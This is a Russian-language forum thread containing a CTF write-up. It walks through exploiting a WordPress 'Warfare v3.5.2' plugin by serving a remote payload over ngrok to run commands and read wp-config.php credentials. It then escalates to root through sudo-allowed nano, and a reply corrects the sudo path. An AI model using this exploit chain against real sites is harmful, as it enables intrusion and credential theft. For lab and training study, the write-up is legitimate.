HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Этичный хакинг или пентестинг > Задания/Квесты/CTF/Конкурсы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 18.07.2023, 21:41
delifer
Новичок
Регистрация: 20.02.2022
Сообщений: 0
С нами: 2226531

Репутация: 0
По умолчанию

Ответы на вопросы
Будет ли видео на канале? - Нет, по 2 причинам:
1) Я могу запалить свой IP или другую информацию
2) квесты, условно говоря, являются "премиальными" тасками
Но на твоём канале уже есть прохождение таска "Подземелье" -Тогда я ещё не знал что таски являются "премиальными", + вроде ничего не запалил серьёзного, поэтому и удалять не стал.

Решение таска
После попадания на сайт нам нужно заглянуть в код элемента.

Там мы находим комментарий который нам намекает на уязвимый компонент.



Я сначала обнаружил ссылки связаные с WordPress и начал искать изъяны в нём

Находим информацию в интернете по запросу "Warfare v3.5.2 exploit" и находимgithub с эксплойтом.

Теперь самое неприятное, это работа с ngrok. Запускаем на своей машине ngrok и Python сервер.

Код:
ngrok http 8000
Код:
python3 http.server 8000
Теперь в ключах программы нужно указать наш ngrok адрес и путь к срипту который содержит следующий сценарий.

Код:
python2 script.py --target URL --payload-uri NGROK-LINK/payload.txt
Важно запускать на версии python2, иначе скрипт не запуститься!

В payload.txt пишем:

Код:
system('id')
Если при выводе в терминале где у вас запущен python сервер получили ответ, Бинго!

В файлах конфигурации сервера, а именно в файле wp-config.php мы находим пароль от пользователя Kiddie.

Код:
system('cat ../wp-config.php')
Подключаемся по ssh, ngrok и сервер можно отключить, чтобы не напрягать наш компьютер и себя лишними окнами.

Пишем команду
Код:
sudo -l
и смотрим что нам доступно... Мы можем открывать txt файлы от лица суперпользователя в директории /tmp с помощью nano.

Как мы знаем (а кто не знает сейчас узнает), мы можем исполнять команды в nano.

Создаём текстовый файл например "1.txt" и открываем следующим образом.

Код:
sudo nano 1.txt
В нём ничего писать не надо, нажимаем комбинацию Ctrl+T, и в поле ввода вводим
Код:
ls /root/
, если результат есть, то поздравляю, таск пройден, собираем ключ воедино и завершаем!
 
Ответить с цитированием

  #2  
Старый 19.07.2023, 13:31
yetiraki
Новичок
Регистрация: 07.02.2023
Сообщений: 0
С нами: 1719376

Репутация: 0
По умолчанию

Спасибо за райтап.
Только не sudo nano 1.txt, а sudo /usr/bin/nano /tmp/1.txt
Так как sudo nano вызывает nano из /bin/nano, на что у нас нет прав
 
Ответить с цитированием

  #3  
Старый 19.07.2023, 14:36
delifer
Новичок
Регистрация: 20.02.2022
Сообщений: 0
С нами: 2226531

Репутация: 0
По умолчанию

Цитата:

yetiraki сказал(а):

Спасибо за райтап.
Только не sudo nano 1.txt, а sudo /usr/bin/nano /tmp/1.txt
Так как sudo nano вызывает nano из /bin/nano, на что у нас нет прав

Цитата:

Странно конечно, но у меня и так сработало, спасибо за ответ!
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.